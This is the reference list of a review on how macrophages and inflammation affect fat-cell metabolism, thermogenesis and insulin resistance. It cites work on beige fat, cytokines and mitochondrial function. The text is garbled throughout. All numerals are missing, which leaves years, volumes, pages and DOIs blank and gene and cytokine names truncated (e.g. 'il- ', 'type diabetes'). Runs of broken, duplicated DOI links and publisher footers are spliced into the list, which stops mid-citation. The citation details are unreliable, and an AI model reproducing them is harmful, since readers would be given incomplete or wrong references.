qiu y, nguyen kd, odegaard ji, cui x, tian x, locksley rm, palmiter rd & chawla a. eosinophils and type cytokine signaling in macrophages orchestrate development of functional beige fat. cell.
rao rr, long jz, white jp, svensson kj, lou j, lokurkar i, jedrychowski mp, ruas jl, wrann cd, lo jc, et al. meteorin-like is a hormone that regulates immune-adipose interactions to increase beige fat thermogenesis. cell.
nguyen kd, qiu y, cui x, goh yps, mwangi j, david t, mukundan l, brombacher f, locksley rm & chawla a. alternatively activated macrophages produce catecholamines to sustain adaptive thermogenesis. nature.
fischer k, ruiz hh, jhun k, finan b, oberlin dj, van der heide v, kalinovich av, petrovic n, wolf y, clemmensen c, et al. alternatively activated macrophages do not synthesize catecholamines or contribute to adipose tissue adaptive thermogenesis. nature medicine.
pirzgalska rm, seixas e, seidman js, link vm, sánchez nm, mahú i, mendes r, gres v, kubasova n, morris i, et al. sympathetic neuron-associated macrophages contribute to obesity by importing and metabolizing norepinephrine. nature medicine.
feng j, li l, ou z, li q, gong b, zhao z, qi w, zhou t, zhong j, cai w, et al. il- stimulates m macrophage polarization and thereby promotes mitochondrial respiratory capacity and lipolysis in adipose tissues against obesity. cellular and molecular immunology.
qian sw, wu my, wang yn, zhao yx, zou y, pan jb, tang y, liu y, guo l & tang qq. bmp facilitates beige fat biogenesis via regulating adipose tissue macrophages. journal of molecular cell biology.
lee yh, kim sn, kwon hj, maddipati kr & granneman jg. adipogenic role of alternatively activated macrophages in β-adrenergic remodeling of white adipose tissue. american journal of physiology: regulatory, integrative and comparative physiology.
keuper m, sachs s, walheim e, berti l, raedle b, tews d, fischer-posovszky p, wabitsch m, hrabě de angelis m, kastenmüller g, et al. activated macrophages control human adipocyte mitochondrial bioenergetics via secreted factors. molecular metabolism.
keuper m, blüher m, schön mr, möller p, dzyakanchuk a, amrein k, debatin km, wabitsch m & fischer-posovszky p. an inflammatory micro-environment promotes human adipocyte apoptosis. molecular and cellular endocrinology.
ehrlund a, acosta jr, björk c, hedén p, douagi i, arner p & laurencikiene j. the cell-type specific transcriptome in human adipose tissue and influence of obesity on adipocyte progenitors. scientific data.
cancello r, henegar c, viguerie n, taleb s, poitou c, rouault c, coupaye m, pelloux v, hugol d, bouillot jl, et al. reduction of macrophage infiltration and chemoattractant gene expression changes in white adipose tissue of morbidly obese subjects after surgery-induced weight loss. diabetes.
duffaut c, zakaroff-girard a, bourlier v, decaunes p, maumus m, chiotasso p, sengenès c, lafontan m, galitzky j & bouloumié a. interplay between human adipocytes and t lymphocytes in obesity: ccl as an adipochemokine and t lymphocytes as lipogenic modulators. arteriosclerosis, thrombosis, and vascular biology.
curat ca, miranville a, sengenès c, diehl m, tonus c, busse r & bouloumié a. from blood monocytes to adipose tissue-resident macrophages: induction of diapedesis by human mature adipocytes. diabetes.
curat ca, wegner v, sengenès c, miranville a, tonus c, busse r & bouloumié a. macrophages in human visceral adipose tissue: increased accumulation in obesity and a source of resistin and visfatin. diabetologia.
koppaka s, kehlenbrink s, carey m, li w, sanchez e, lee de, lee h, chen j, carrasco e, kishore p, et al. reduced adipose tissue macrophage content is associated with improved insulin sensitivity in thiazolidinedione-treated diabetic humans. diabetes.
van harmelen v, skurk t, röhrig k, lee ym, halbleib m, aprath-husmann i & hauner h. effect of bmi and age on adipose tissue cellularity and differentiation capacity in women. international journal of obesity and related metabolic disorders.
zimmerlin l, donnenberg vs, pfeifer me, meyer em, péault b, rubin jp & donnenberg ad. stromal vascular progenitors in adult human adipose tissue. cytometry: part a.
klar as, güven s, zimoch j, zapiórkowska na, biedermann t, böttcher-haberzeth s, meuli-simmen c, martin i, scherberich a, reichmann e, et al. characterization of vasculogenic potential of human adipose-derived endothelial cells in a three-dimensional vascularized skin substitute. pediatric surgery international.
glastonbury ca, couto alves a, el-sayed moustafa j & small ks. cell-type heterogeneity in adipose tissue is associated with complex traits and reveals disease-relevant cell-specific eqtls. american journal of human genetics [epub].
travers rl, motta ac, betts ja, bouloumié a & thompson d. the impact of adiposity on adipose tissue-resident lymphocyte activation in humans. international journal of obesity.
harman-boehm i, blüher m, redel h, sion-vardy n, ovadia s, avinoach e, shai i, klöting n, stumvoll m, bashan n, et al. macrophage infiltration into omental versus subcutaneous fat across different populations: effect of regional adiposity and the comorbidities of obesity. journal of clinical endocrinology and metabolism.
bruun jm, lihn as, pedersen sb & richelsen b. monocyte chemoattractant protein- release is higher in visceral than subcutaneous human adipose tissue (at): implication of macrophages resident in the at. journal of clinical endocrinology and metabolism.
cancello r, tordjman j, poitou c, guilhem g, bouillot jl, hugol d, coussieu c, basdevant a, hen ab, bedossa p, et al. increased infiltration of macrophages in omental adipose tissue is associated with marked hepatic lesions in morbid human obesity. diabetes.
spencer m, yao-borengasser a, unal r, rasouli n, gurley cm, zhu b, peterson ca & kern pa. adipose tissue macrophages in insulin-resistant subjects are associated with collagen vi and fibrosis and demonstrate alternative activation. american journal of physiology: endocrinology and metabolism.
blaszczak am, jalilvand a, liu j, wright vp, suzo a, needleman b, noria s, lafuse w, hsueh wa & bradley d. human visceral adipose tissue macrophages are not adequately defined by standard methods of characterization. journal of diabetes research.
laparra a, tricot s, le van m, damouche a, gorwood j, vaslin b, favier b, benoist s, ho tsong fang r, bosquet n, et al. the frequencies of immunosuppressive cells in adipose tissue differ in human, non-human primate, and mouse models. frontiers in immunology.
renovato-martins m, matheus me, de andrade ir, moraes ja, da silva sv, citelli dos reis m, de souza aap, da silva cc, bouskela e & barja-fidalgo c. microparticles derived from obese adipose tissue elicit a pro-inflammatory phenotype of cd +, ccr + and tlr + monocytes. biochimica et biophysica acta (bba): molecular basis of disease.
weisberg sp, hunter d, huber r, lemieux j, slaymaker s, vaddi k, charo i, leibel rl & ferrante aw. ccr modulates inflammatory and metabolic effects of high-fat feeding. journal of clinical investigation.
kanda h, tateya s, tamori y, kotani k, hiasa k, kitazawa r, kitazawa s, miyachi h, maeda s, egashira k, et al. mcp- contributes to macrophage infiltration into adipose tissue, insulin resistance, and hepatic steatosis in obesity. journal of clinical investigation.
cinti s, mitchell g, barbatelli g, murano i, ceresi e, faloia e, wang s, fortier m, greenberg as & obin ms. adipocyte death defines macrophage localization and function in adipose tissue of obese mice and humans. journal of lipid research.
lumeng cn, deyoung sm, bodzin jl & saltiel ar. increased inflammatory properties of adipose tissue macrophages recruited during diet-induced obesity. diabetes.
nguyen mta, favelyukis s, nguyen ak, reichart d, scott pa, jenn a, liu-bryan r, glass ck, neels jg & olefsky jm. a subpopulation of macrophages infiltrates hypertrophic adipose tissue and is activated by free fatty acids via toll-like receptors and jnk-dependent pathways. journal of biological chemistry.
oh dy, morinaga h, talukdar s, bae ej & olefsky jm. increased macrophage migration into adipose tissue in obese mice. diabetes.
amano su, cohen jl, vangala p, tencerova m, nicoloro sm, yawe jc, shen y, czech mp & aouadi m. local proliferation of macrophages contributes to obesity-associated adipose tissue inflammation. cell metabolism.
braune j, weyer u, hobusch c, mauer j, brüning jc, bechmann i & gericke m. il- regulates m polarization and local proliferation of adipose tissue macrophages in obesity. journal of immunology.
ramkhelawon b, hennessy ej, ménager m, ray td, sheedy fj, hutchison s, wanschel a, oldebeken s, geoffrion m, spiro w, et al. netrin- promotes adipose tissue macrophage retention and insulin resistance in obesity. nature medicine.
brestoff jr, kim bs, saenz sa, stine rr, monticelli la, sonnenberg gf, thome jj, farber dl, lutfy k, seale p, et al. group innate lymphoid cells promote beiging of white adipose tissue and limit obesity. nature.
liu ps, lin yw, burton fh & wei ln. injecting engineered anti-inflammatory macrophages therapeutically induces white adipose tissue browning and improves diet-induced insulin resistance. adipocyte.
kosteli a, sugaru e, haemmerle g, martin jf, lei j, zechner r & ferrante aw. weight loss and lipolysis promote a dynamic immune response in murine adipose tissue. journal of clinical investigation.
fitzgibbons tp & czech mp. emerging evidence for beneficial macrophage functions in atherosclerosis and obesity-induced insulin resistance. journal of molecular medicine.
xu x, grijalva a, van skowronski a, van eijk m, serlie mj & ferrante aw. obesity activates a program of lysosomal-dependent lipid metabolism in adipose tissue macrophages independently of classic activation. cell metabolism.
satoh t, kidoya h, naito h, yamamoto m, takemura n, nakagawa k, yoshioka y, morii e, takakura n, takeuchi o, et al. critical role of trib in differentiation of tissue-resident m -like macrophages. nature.
wu d, molofsky ab, liang he, ricardo-gonzalez rr, jouihan ha, bando jk, chawla a & locksley rm. eosinophils sustain adipose alternatively activated macrophages associated with glucose homeostasis. science.
lee mw, odegaard ji, mukundan l, qiu y, molofsky ab, nussbaum jc, yun k, locksley rm & chawla a. activated type innate lymphoid cells regulate beige fat biogenesis. cell.
lumeng cn, bodzin jl & saltiel ar. obesity induces a phenotypic switch in adipose tissue macrophage polarization. journal of clinical investigation.
boutagy ne, mcmillan rp, frisard mi & hulver mw. metabolic endotoxemia with obesity: is it real and is it relevant? biochimie.
murray pj, allen je, biswas sk, fisher ea, gilroy dw, goerdt s, gordon s, hamilton ja, ivashkiv lb, lawrence t, et al. macrophage activation and polarization: nomenclature and experimental guidelines. immunity.
thomas ac & mattila jt. 'of mice and men': arginine metabolism in macrophages. frontiers in immunology.
raes g, den bergh rv, baetselier pd & ghassabeh gh. arginase- and ym are markers for murine, but not human, alternatively activated myeloid cells. journal of immunology.
schneemann m & schoeden g. macrophage biology and immunology: man is not a mouse. journal of leukocyte biology.
gross tj, kremens k, powers ls, brink b, knutson t, domann fe, philibert ra, milhem mm & monick mm. epigenetic silencing of the human nos gene: rethinking the role of nitric oxide in human macrophage inflammatory responses. journal of immunology.
fjeldborg k, pedersen sb, møller hj, christiansen t, bennetzen m & richelsen b. human adipose tissue macrophages are enhanced but changed to an anti-inflammatory profile in obesity. journal of immunology research.
li p, lu m, nguyen mta, bae ej, chapman j, feng d, hawkins m, pessin je, sears dd, nguyen ak, et al. functional heterogeneity of cd c-positive adipose tissue macrophages in diet-induced obese mice. journal of biological chemistry.
wentworth jm, naselli g, brown wa, doyle l, phipson b, smyth gk, wabitsch m, o'brien pe & harrison lc. pro-inflammatory cd c+cd + adipose tissue macrophages are associated with insulin resistance in human obesity. diabetes.
nakajima s, koh v, kua lf, so j, davide l, lim ks, petersen sh, yong wp, shabbir a & kono k. accumulation of cd c+cd + adipose tissue macrophages through upregulation of intracellular β-hsd in human obesity. journal of immunology.
zeyda m, farmer d, todoric j, aszmann o, speiser m, györi g, zlabinger gj & stulnig tm. human adipose tissue macrophages are of an anti-inflammatory phenotype but capable of excessive pro-inflammatory mediator production. international journal of obesity.
kratz m, coats br, hisert kb, hagman d, mutskov v, peris e, schoenfelt kq, kuzma jn, larson i, billing ps, et al. metabolic dysfunction drives a mechanistically distinct proinflammatory phenotype in adipose tissue macrophages. cell metabolism.
fassina g, dorigo p, badetti r & visco l. effect of oxidative phosphorylation inhibitors on cyclic adenosine monophosphate synthesis in rat adipose tissue. biochemical pharmacology.
demine s, tejerina s, bihin b, thiry m, reddy n, renard p, raes m, jadot m & arnould t. mild mitochondrial uncoupling induces hsl/atgl-independent lipolysis relying on a form of autophagy in t -l adipocytes. journal of cellular physiology.
maassen ja, romijn ja & heine rj. fatty acid-induced mitochondrial uncoupling in adipocytes as a key protective factor against insulin resistance and beta cell dysfunction: a new concept in the pathogenesis of obesity-associated type diabetes mellitus. diabetologia.
contreras l, drago i, zampese e & pozzan t. mitochondria: the calcium connection. biochimica et biophysica acta.
pershadsingh ha, shade dl, delfert dm & mcdonald jm. chelation of intracellular calcium blocks insulin action in the adipocyte. pnas.
wang y, ali y, lim cy, hong w, pang zp & han w. insulin-stimulated leptin secretion requires calcium and pi k/akt activation. biochemical journal.
wang ch, chen yf, wu cy, wu pc, huang yl, kao ch, lin ch, kao ls, tsai tf & wei yh. cisd modulates the differentiation and functioning of adipocytes by regulating intracellular ca + homeostasis. human molecular genetics.
shi h, halvorsen yd, ellis pn, wilkison wo & zemel mb. role of intracellular calcium in human adipocyte differentiation. physiological genomics.
wright le, vecellio reane d, milan g, terrin a, di bello g, belligoli a, sanna m, foletto m, favaretto f, raffaello a, et al. increased mitochondrial calcium uniporter in adipocytes underlies mitochondrial alterations associated with insulin resistance. american journal of physiology: endocrinology and metabolism.
tormos kv, anso e, hamanaka rb, eisenbart j, joseph j, kalyanaraman b & chandel ns. mitochondrial complex iii ros regulate adipocyte differentiation. cell metabolism.
zhang y, marsboom g, toth pt & rehman j. mitochondrial respiration regulates adipogenic differentiation of human mesenchymal stem cells. plos one.
keuper m, jastroch m, yi cx, fischer-posovszky p, wabitsch m, tschop mh & hofmann sm. spare mitochondrial respiratory capacity permits human adipocytes to maintain atp homeostasis under hypoglycemic conditions. faseb journal.
wilson-fritch l, burkart a, bell g, mendelson k, leszyk j, nicoloro s, czech m & corvera s. mitochondrial biogenesis and remodeling during adipogenesis and in response to the insulin sensitizer rosiglitazone. molecular and cellular biology.
böttcher h & fürst p. microcalorimetric and biochemical investigations of thermogenesis and metabolic pathways in human white adipocytes. international journal of obesity and related metabolic disorders.
von heimburg dv, hemmrich k, zachariah s, staiger h & pallua n. oxygen consumption in undifferentiated versus differentiated adipogenic mesenchymal precursor cells. respiratory physiology and neurobiology.
kraunsøe r, boushel r, hansen cn, schjerling p, qvortrup k, støckel m, mikines kj & dela f. mitochondrial respiration in subcutaneous and visceral adipose tissue from patients with morbid obesity. journal of physiology.
schöttl t, kappler l, braun k, fromme t & klingenspor m. limited mitochondrial capacity of visceral versus subcutaneous white adipocytes in male c bl/ n mice. endocrinology.
krief s, lönnqvist f, raimbault s, baude b, van spronsen a, arner p, strosberg ad, ricquier d & emorine lj. tissue distribution of beta -adrenergic receptor mrna in man. journal of clinical investigation.
villaret a, galitzky j, decaunes p, estève d, marques ma, sengenès c, chiotasso p, tchkonia t, lafontan m, kirkland jl, et al. adipose tissue endothelial cells from obese human subjects: differences among depots in angiogenic, metabolic, and inflammatory gene expression and cellular senescence. diabetes.
vatier c, kadiri s, muscat a, chapron c, capeau j & antoine b. visceral and subcutaneous adipose tissue from lean women respond differently to lipopolysaccharide-induced alteration of inflammation and glyceroneogenesis. nutrition and diabetes.
keuper m, berti l, raedle b, sachs s, böhm a, fritsche l, fritsche a, häring hu, hrabě de angelis m, jastroch m, et al. preadipocytes of obese humans display gender-specific bioenergetic responses to glucose and insulin. molecular metabolism.
campbell pj, carlson mg, hill jo & nurjhan n. regulation of free fatty acid metabolism by insulin in humans: role of lipolysis and reesterification. american journal of physiology.
reshef l, olswang y, cassuto h, blum b, croniger cm, kalhan sc, tilghman sm & hanson rw. glyceroneogenesis and the triglyceride/fatty acid cycle. journal of biological chemistry.
flachs p, rossmeisl m, kuda o & kopecky j. stimulation of mitochondrial oxidative capacity in white fat independent of ucp : a key to lean phenotype. biochimica et biophysica acta.
guilherme a, virbasius jv, puri v & czech mp. adipocyte dysfunctions linking obesity to insulin resistance and type diabetes. nature reviews: molecular cell biology.
wilson-fritch l, nicoloro s, chouinard m, lazar ma, chui pc, leszyk j, straubhaar j, czech mp & corvera s. mitochondrial remodeling in adipose tissue associated with obesity and treatment with rosiglitazone. journal of clinical investigation.
yeo cr, agrawal m, hoon s, shabbir a, shrivastava mk, huang s, khoo cm, chhay v, yassin ms, tai es, et al. sgbs cells as a model of human adipocyte browning: a comprehensive comparative study with primary human white subcutaneous adipocytes. scientific reports.
sörbris r, nilsson-ehle p, monti m & wadsö i. differences in heat production between adipocytes from obese and normal weight individuals. febs letters.
digirolamo m, newby fd & lovejoy j. lactate production in adipose tissue: a regulated function with extra-adipose implications. faseb journal.
van der merwe mt, schlaphoff gp, crowther nj, boyd ih, gray ip, joffe bi & lönnroth pn. lactate and glycerol release from adipose tissue in lean, obese, and diabetic women from south africa. journal of clinical endocrinology and metabolism.
simoneau ja & kelley de. altered glycolytic and oxidative capacities of skeletal muscle contribute to insulin resistance in niddm. journal of applied physiology.
ceperuelo-mallafré v, ejarque m, serena c, duran x, montori-grau m, rodríguez ma, yanes o, núñez-roa c, roche k, puthanveetil p, et al. adipose tissue glycogen accumulation is associated with obesity-linked inflammation in humans. molecular metabolism.
si y, palani s, jayaraman a & lee k. effects of forced uncoupling protein expression in t -l cells on mitochondrial function and lipid metabolism. journal of lipid research.
si y, shi h & lee k. metabolic flux analysis of mitochondrial uncoupling in t -l adipocytes. plos one.
mitrou p, boutati e, lambadiari v, maratou e, papakonstantinou a, komesidou v, sidossis l, tountas n, katsilambros n, economopoulos t, et al. rates of glucose uptake in adipose tissue and muscle in vivo after a mixed meal in women with morbid obesity. journal of clinical endocrinology and metabolism.
tejerina s, de pauw a, vankoningsloo s, houbion a, renard p, de longueville f, raes m & arnould t. mild mitochondrial uncoupling induces t -l adipocyte de-differentiation by a ppar-independent mechanism, whereas tnf-induced de-differentiation is ppar dependent. journal of cell science.
stefan n, kantartzis k, machann j, schick f, thamer c, rittig k, balletshofer b, machicao f, fritsche a & häring hu. identification and characterization of metabolically benign obesity in humans. archives of internal medicine.
klöting n, fasshauer m, dietrich a, kovacs p, schön mr, kern m, stumvoll m & blüher m. insulin-sensitive obesity. american journal of physiology: endocrinology and metabolism.
phillips cm & perry ij. does inflammation determine metabolic health status in obese and nonobese adults? journal of clinical endocrinology and metabolism.
wildman rp, kaplan r, manson je, rajkovic a, connelly sa, mackey rh, tinker lf, curb jd, eaton cb & wassertheil-smoller s. body size phenotypes and inflammation in the women's health initiative observational study. obesity.
karelis ad, faraj m, bastard jp, st-pierre dh, brochu m, prud'homme d & rabasa-lhoret r. the metabolically healthy but obese individual presents a favorable inflammation profile. journal of clinical endocrinology and metabolism.
zhang hh, halbleib m, ahmad f, manganiello vc & greenberg as. tumor necrosis factor-alpha stimulates lipolysis in differentiated human adipocytes through activation of extracellular signal-related kinase and elevation of intracellular camp. diabetes.
gao d, madi m, ding c, fok m, steele t, ford c, hunter l & bing c. interleukin- β mediates macrophage-induced impairment of insulin signaling in human primary adipocytes. american journal of physiology: endocrinology and metabolism.
van hall g, steensberg a, sacchetti m, fischer c, keller c, schjerling p, hiscock n, møller k, saltin b, febbraio ma, et al. interleukin- stimulates lipolysis and fat oxidation in humans. journal of clinical endocrinology and metabolism.
hotamisligil gs, murray dl, choy ln & spiegelman bm. tumor necrosis factor alpha inhibits signaling from the insulin receptor. pnas.
xie x, sinha s, yi z, langlais pr, madan m, bowen bp, willis w & meyer c. role of adipocyte mitochondria in inflammation, lipemia and insulin sensitivity in humans: effects of pioglitazone treatment. international journal of obesity.
ohashi k, parker jl, ouchi n, higuchi a, vita ja, gokce n, pedersen aa, kalthoff c, tullin s, sams a, et al. adiponectin promotes macrophage polarization toward an anti-inflammatory phenotype. journal of biological chemistry.
maya-monteiro cm, almeida pe, d'avila h, martins as, rezende ap, castro-faria-neto h & bozza pt. leptin induces macrophage lipid body formation by a phosphatidylinositol -kinase- and mammalian target of rapamycin-dependent mechanism. journal of biological chemistry.
tang l, okamoto s, shiuchi t, toda c, takagi k, sato t, saito k, yokota s & minokoshi y. sympathetic nerve activity maintains an anti-inflammatory state in adipose tissue in male mice by inhibiting tnf-α gene expression in macrophages. endocrinology.
lumeng cn, deyoung sm & saltiel ar. macrophages block insulin action in adipocytes by altering expression of signaling and glucose transport proteins. american journal of physiology: endocrinology and metabolism.
keuper m, dzyakanchuk a, amrein ke, wabitsch m & fischer-posovszky p. thp- macrophages and sgbs adipocytes – a new human in vitro model system of inflamed adipose tissue. frontiers in endocrinology.
stouthard jml, oude elferink rpj & sauerwein hp. interleukin- enhances glucose transport in t -l adipocytes. biochemical and biophysical research communications.
jager j, grémeaux t, cormont m, le marchand-brustel y & tanti jf. interleukin- beta-induced insulin resistance in adipocytes through down-regulation of insulin receptor substrate- expression. endocrinology.
sartipy p & loskutoff dj. monocyte chemoattractant protein in obesity and insulin resistance. pnas.
nøhr mk, bobba n, richelsen b, lund s & pedersen sb. inflammation downregulates ucp expression in brown adipocytes potentially via sirt and dbc interaction. international journal of molecular sciences.
goto t, naknukool s, yoshitake r, hanafusa y, tokiwa s, li y, sakamoto t, nitta t, kim m, takahashi n, et al. proinflammatory cytokine interleukin- β suppresses cold-induced thermogenesis in adipocytes. cytokine.
dahlman i, forsgren m, sjögren a, nordström ea, kaaman m, näslund e, attersand a & arner p. downregulation of electron transport chain genes in visceral adipose tissue in type diabetes independent of obesity and possibly involving tumor necrosis factor-α. diabetes.
wolf y, boura-halfon s, cortese n, haimon z, sar shalom h, kuperman y, kalchenko v, brandis a, david e, segal-hayoun y, et al. brown-adipose-tissue macrophages control tissue innervation and homeostatic energy expenditure. nature immunology.
https://doi.org/ . /jlr.m -jlr https://doi.org/ . /jlr.m -jlr https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /jc. - https://doi.org/ . /jcs. https://doi.org/ . /jcs. https://doi.org/ . /archinte. . . https://doi.org/ . /archinte. . . https://doi.org/ . /ajpendo. . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /oby. . https://doi.org/ . /oby. . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /diabetes. . . https://doi.org/ . /ajpendo. . https://doi.org/ . /jc. - https://doi.org/ . /pnas. . . https://doi.org/ . /pnas. . . https://doi.org/ . /ijo. . https://doi.org/ . /ijo. . https://doi.org/ . /jbc.m . https://doi.org/ . /jbc.m https://doi.org/ . /jbc.m https://doi.org/ . /en. - https://doi.org/ . /ajpendo. . https://doi.org/ . /ajpendo. . https://doi.org/ . /fendo. . https://doi.org/ . /bbrc. . https://doi.org/ . /bbrc. . https://doi.org/ . /en. - https://doi.org/ . /en. - https://doi.org/ . /pnas. https://doi.org/ . /pnas. https://doi.org/ . /ijms https://doi.org/ . /ijms https://doi.org/ . /j.cyto. . . https://doi.org/ . /j.cyto. . . https://doi.org/ . /db - https://doi.org/ . /db - https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r pb–r : and homeostatic energy expenditure. nature immunology – . (https://doi.org/ . /ni. ) camell cd, sander j, spadaro o, lee a, nguyen ky, wing a, goldberg el, youm yh, brown cw, elsworth j, et al. inflammasome- driven catecholamine catabolism in macrophages blunts lipolysis during ageing. nature – . (https://doi.org/ . / nature ) balter nj & schwartz sl. accumulation of norepinephrine by macrophages and relationships to known uptake processes. journal of pharmacology and experimental therapeutics – . fabbiano s, suárez-zamorano n, rigo d, veyrat-durebex c, stevanovic dokic a, colin dj & trajkovski m. caloric restriction leads to browning of white adipose tissue through type immune signaling. cell metabolism – . (https://doi. org/ . /j.cmet. . . ) kim kh, kim yh, son je, lee jh, kim s, choe ms, moon jh, zhong j, fu k, lenglin f, et al. intermittent fasting promotes adipose thermogenesis and metabolic homeostasis via vegf-mediated alternative activation of macrophage. cell research – . (https://doi.org/ . /cr. . ) bartelt a & heeren j. adipose tissue browning and metabolic health. nature reviews: endocrinology – . (https://doi. org/ . /nrendo. . ) abdullahi a, chen p, stanojcic m, sadri ar, coburn n & jeschke mg. il- signal from the bone marrow is required for the browning of white adipose tissue post burn injury. shock – . (https:// doi.org/ . /shk. ) han j, meng q, shen l & wu g. interleukin- induces fat loss in cancer cachexia by promoting white adipose tissue lipolysis and browning. lipids in health and disease . (https://doi. org/ . /s - - - ) knudsen jg, murholm m, carey al, biensø rs, basse al, allen tl, hidalgo j, kingwell ba, febbraio ma, hansen jb, et al. role of il- in exercise training- and cold-induced ucp expression in subcutaneous white adipose tissue. plos one e . (https://doi.org/ . /journal.pone. ) babaei r, schuster m, meln i, lerch s, ghandour ra, pisani df, bayindir-buchhalter i, marx j, wu s, schoiswohl g, et al. jak-tgfβ cross-talk links transient adipose tissue inflammation to beige adipogenesis. science signaling eaai . (https://doi. 
org/ . /scisignal.aai ) lizcano f, vargas d, gómez Á & torrado a. human admc- derived adipocyte thermogenic capacity is regulated by il- receptor. stem cells international . (https://doi. org/ . / / ) shiau my, lu hf, chang yh, chiu yc & shih yl. characterization of proteins regulated by interleukin- in t -l adipocytes. springerplus . (https://doi.org/ . /s - - - ) cautivo km & molofsky ab. regulation of metabolic health and adipose tissue function by group innate lymphoid cells. european journal of immunology – . (https://doi.org/ . / eji. ) villarroya f, cereijo r, villarroya j, gavaldà-navarro a & giralt m. toward an understanding of how immune cells control brown and beige adipobiology. cell metabolism – . (https://doi. org/ . /j.cmet. . . ) miller le, jüsten hp, schölmerich j & straub rh. the loss of sympathetic nerve fibers in the synovial tissue of patients with rheumatoid arthritis is accompanied by increased norepinephrine release from synovial macrophages. faseb journal – . (https://doi.org/ . /fj. - com) spengler rn, chensue sw, giacherio da, blenk n & kunkel sl. endogenous norepinephrine regulates tumor necrosis factor-α production from macrophages in vitro. journal of immunology – . wankhade ud, lee jh, dagur pk, yadav h, shen m, chen w, kulkarni ab, mccoy jp, finkel t, cypess am, et al. tgf-β receptor regulates progenitors that promote browning of white fat. molecular metabolism – . (https://doi.org/ . /j. molmet. . . ) yadav h, quijano c, kamaraju ak, gavrilova o, malek r, chen w, zerfas p, zhigang d, wright ec, stuelten c, et al. protection from obesity and diabetes by blockade of tgf-β/smad signaling. cell metabolism – . (https://doi.org/ . /j. cmet. . . ) petrus p, mejhert n, corrales p, lecoutre s, li q, maldonado e, kulyté a, lopez y, campbell m, acosta jr, et al. transforming growth factor-β regulates adipocyte number in subcutaneous white adipose tissue. cell reports .e – .e . (https://doi.org/ . /j. celrep. . . ) pallotta i, sun b, wrona ea & freytes do. bmp protein-mediated crosstalk between inflammatory cells and human pluripotent stem cell- derived cardiomyocytes. journal of tissue engineering and regenerative medicine – . (https://doi.org/ . /term. ) tseng yh, kokkotou e, schulz tj, huang tl, winnay jn, taniguchi cm, tran tt, suzuki r, espinoza do, yamamoto y, et al. new role of bone morphogenetic protein in brown adipogenesis and energy expenditure. nature – . (https://doi. org/ . /nature ) gustafson b, hammarstedt a, hedjazifar s, hoffmann jm, svensson pa, grimsby j, rondinone c & smith u. bmp and bmp antagonists regulate human white and beige adipogenesis. diabetes – . (https://doi.org/ . /db - ) modica s, straub lg, balaz m, sun w, varga l, stefanicka p, profant m, simon e, neubauer h, ukropcova b, et al. bmp promotes a brown to white-like adipocyte shift. cell reports – . (https://doi.org/ . /j.celrep. . . ) whittle aj, carobbio s, martins l, slawik m, hondares e, vázquez mj, morgan d, csikasz ri, gallego r, rodriguez-cuenca s, et al. bmp b increases brown adipose tissue thermogenesis through both central and peripheral actions. cell – . (https:// doi.org/ . /j.cell. . . ) pellegrinelli v, peirce vj, howard l, virtue s, türei d, senzacqua m, frontini a, dalley jw, horton ar, bidault g, et al. adipocyte-secreted bmp b mediates adrenergic-induced remodeling of the neuro- vascular network in adipose tissue. nature communications . (https://doi.org/ . /s - - -x) schulz tj & tseng yh. 
emerging role of bone morphogenetic proteins in adipogenesis and energy metabolism. cytokine and growth factor reviews – . (https://doi.org/ . /j. cytogfr. . . ) varga t, mounier r, patsalos a, gogolák p, peloquin m, horvath a, pap a, daniel b, nagy g, pintye e, et al. macrophage pparγ, a lipid activated transcription factor controls a growth factor gdf and skeletal muscle regeneration. immunity – . (https:// doi.org/ . /j.immuni. . . ) hinoi e, nakamura y, takada s, fujita h, iezaki t, hashizume s, takahashi s, odaka y, watanabe t & yoneda y. growth differentiation factor- promotes brown adipogenesis in systemic energy expenditure. diabetes – . (https://doi. org/ . /db - ) kim jm, kosak jp, kim jk, kissling g, germolec dr, zeldin dc, bradbury ja, baek sj & eling te. nag- /gdf transgenic mouse has less white adipose tissue and a reduced inflammatory response. mediators of inflammation – . (https://doi. org/ . / / ) onishi y, fukasawa k, ozaki k, iezaki t, yoneda y & hinoi e. gdf is a novel mediator of macrophage infiltration in brown adipose tissue of obese mice. biochemistry and biophysics reports – . (https://doi.org/ . /j.bbrep. . . ) this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /ni. https://doi.org/ . /nature https://doi.org/ . /nature https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /cr. . https://doi.org/ . /nrendo. . https://doi.org/ . /nrendo. . https://doi.org/ . /shk. https://doi.org/ . /shk. https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /journal.pone. https://doi.org/ . /scisignal.aai https://doi.org/ . /scisignal.aai https://doi.org/ . / / https://doi.org/ . / / https://doi.org/ . /s - - - https://doi.org/ . /eji. https://doi.org/ . /eji. https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /fj. - com https://doi.org/ . /j.molmet. . . https://doi.org/ . /j.molmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.celrep. . . https://doi.org/ . /j.celrep. . . https://doi.org/ . /term. https://doi.org/ . /nature https://doi.org/ . /nature https://doi.org/ . /db - https://doi.org/ . /j.celrep. . . https://doi.org/ . /j.cell. . . https://doi.org/ . /j.cell. . . https://doi.org/ . /s - - -x https://doi.org/ . /j.cytogfr. . . https://doi.org/ . /j.cytogfr. . . https://doi.org/ . /j.immuni. . . https://doi.org/ . /j.immuni. . . https://doi.org/ . /db - https://doi.org/ . /db - https://doi.org/ . / / https://doi.org/ . / / https://doi.org/ . /j.bbrep. . . https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : adela r & banerjee sk. gdf- as a target and biomarker for diabetes and cardiovascular diseases: a translational prospective. journal of diabetes research . (https://doi. org/ . / / ) shen jj, huang l, li l, 